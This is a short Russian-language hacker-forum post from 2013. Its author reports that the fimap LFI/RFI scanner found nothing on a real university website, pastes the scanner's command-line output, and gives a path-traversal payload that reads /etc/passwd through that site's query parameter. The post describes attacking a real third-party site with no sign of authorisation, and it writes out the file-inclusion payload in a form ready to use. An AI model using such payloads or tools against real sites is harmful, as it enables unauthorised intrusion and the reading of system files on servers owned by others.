Показать сообщение отдельно

  #1  
Старый 16.09.2013, 14:04
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

Пытался поюзать данную тулзу но к сожалению ничего не вышло

ншел 5 lfi уязвимых сайтов сую поочереди в фимап и он мне выдаёт примерно такое

Код:
C:\Windows\system32>cd C:\fimap_alpha_v09

C:\fimap_alpha_v09>fimap.py -u "http://www.lasalle.edu/grad/index.php?section="
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://www.lasalle.edu/grad/index.php?section='
[09:01:15] [OUT] Inspecting URL 'http://www.lasalle.edu/grad/index.php?section='
...
[09:01:15] [INFO] Fiddling around with URL...
Target URL isn't affected by any file inclusion bug :(

C:\fimap_alpha_v09>
а LFI то явно есть

h**p://www.lasalle.edu/grad/index.php?section=../../../../../etc/passwd%00
 
Ответить с цитированием